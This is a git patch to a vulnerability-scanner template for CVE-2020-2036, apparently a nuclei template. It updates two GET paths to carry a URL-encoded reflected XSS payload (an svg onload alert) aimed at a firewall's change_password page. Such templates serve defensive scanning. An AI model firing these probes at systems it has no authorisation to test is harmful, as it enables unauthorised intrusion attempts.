From 25ed9cb314f20238fcb1e6e53c00e2fe6855a2dd Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Mon, 15 Feb 2021 01:31:58 +0530 Subject: [PATCH] Update CVE-2020-2036.yaml --- cves/2020/CVE-2020-2036.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml index 0749aebbe9..1bc96a8882 100644 --- a/cves/2020/CVE-2020-2036.yaml +++ b/cves/2020/CVE-2020-2036.yaml @@ -9,8 +9,8 @@ info: requests: - method: GET path: - - "{{BaseURL}}/unauth/php/change_password.php/">" - - "{{BaseURL}}/php/change_password.php/">" + - "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" + - "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" matchers-condition: and matchers: - type: status